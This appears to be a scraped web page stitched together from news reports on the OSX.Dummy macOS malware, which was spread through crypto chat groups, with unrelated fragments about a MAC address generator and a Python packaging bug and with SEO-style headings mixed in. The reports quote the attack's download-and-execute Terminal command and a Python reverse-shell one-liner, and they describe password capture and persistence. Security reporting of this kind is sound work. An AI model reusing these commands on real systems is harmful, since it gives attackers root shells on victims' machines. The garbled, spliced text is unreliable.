The Dumb Binary For Mac
Share this story. Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms has been attempting to lure others into installing macOS malware. The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs.
The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker., a Mac malware expert, also examined the malware and dubbed it 'OSX.Dummy' because, as he wrote:. the infection method is dumb. the massive size of the binary is dumb. the persistence mechanism is lame (and thus also dumb). the capabilities are rather limited (and thus rather dumb).
Mac Address Generator is an online tool to represent your MAC address based on your selection of address format and the prefix values. MAC is the abbreviation of Media Access Controller and it has the 12 digit identification number assigned by the Network Interface Card (NIC) manufacturers. Hi Paramiko developers! In 2013 I published pip-accel and it wasn't long before the first bug report came in that the python bdist_dumb command was broken for the ssh package on Mac OS X. After some analysis I realized that the ssh package included a distutils monkey patch ( which had become incompatible with newer versions of distutils.
it's trivial to detect at every step (that dumb). And finally, the malware saves the user's password to dumpdummy The attack, today, downloads its awkward payload from a remote server, makes that file executable, and runs it. It looks something like this: cd /tmp && curl -s curl $MALICIOUSURL script && chmod +x script &&./script The monster binary carries with it a host of libraries, including Open SSL libraries to encrypt its communications back to the server—a system running in a data center of the hosting provider CrownCloud. Once it executes, it uses the sudo command to make itself owned by macOS's root user. In order for this to happen, the victim has to enter a password to allow the script to continue. The script stores that password in a temporary file called 'dumpdummy'. The script also issues commands to add itself to the startup list for macOS—making itself persistent.
The script's backdoor code, as Wardle noted, is a recursive Python command-line call with a hard-coded IP address for the connection that uses port 1337—an obvious joke. #!/bin/bash while: do python -c 'import socket,subprocess,os; s=socket.socket(socket.AFINET,socket.SOCKSTREAM); s.connect(('',1337)); os.dup2(s.fileno,0); os.dup2(s.fileno,1); os.dup2(s.fileno,2);'/bin/sh','-i');' sleep 5 done The attacker's intent is not yet clear. But because all of this executes through a Terminal window, it bypasses MacOS's GateKeeper malware protection, despite being unsigned code.
The Dumb Binary For Mac Free
And it gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code has to overcome the common sense of the victim as well.
“ Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef. The Wardle intent was to demonstrate that the Objective-See’s tools can generically thwart even if it was undetected by all the anti-virus software.
Verhoef noticed that the attack was originating within crypto related Slack or Discord chats groups by impersonating admins or key people. The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.
$ cd /tmp && curl -s curl $MALICIOUSURL script && chmod +x script &&./script Wardle noticed that the malicious binary is not signed, this means it would be blocked by GateKeeper, but attackers overwhelmed this limitation by making the victims to download and run the binary directly via terminal commands. Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed. The malware first sets script to be owned as root # procInfo monitoring for process events. Process start: pid: 432 path: /usr/bin/sudo args: ( '/usr/bin/sudo', '-S', '-p', '#node-sudo-passwd#', chown, root, '/tmp/' ) then it changes file’s permissions to root by executing the sudo command, but this will require the user to enter the password in the terminal. The password is saved by the malicious code in the folder /tmp/dumpdummy; The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon. The script will attempt to connect to on port 1337. “It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the –i flag.
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The Dumb Binary For Mac Download
In other words, it’s setting up an interactive reverse shell. “If you have a firewall product installed, such as Objective-See’s, this network activity will be detected” If the malware successfully connects the C&C server (, the attacker will be able to arbitrarily execute commands as root on the target system. Below the key findings of Wardle analysis on the OSX.Dummy:. the infection method is dumb. the massive size of the binary is dumb.
the persistence mechanism is lame (and thus also dumb). the capabilities are rather limited (and thus rather dumb). it’s trivial to detect at every step (that dumb). and finally, the malware saves the user’s password to dumpdummy “To check if you’re infected run as root (since the malware set’s it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘'” Wardle concluded.
The Dumb Binary For Machine
Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at 'Cyber Defense Magazine', Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog 'Security Affairs' recently named a Top National Security Resource for US. Pierluigi is a member of the 'The Hacker News' team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books 'The Deep Dark Web' and “Digital Virtual Currency and Bitcoin”.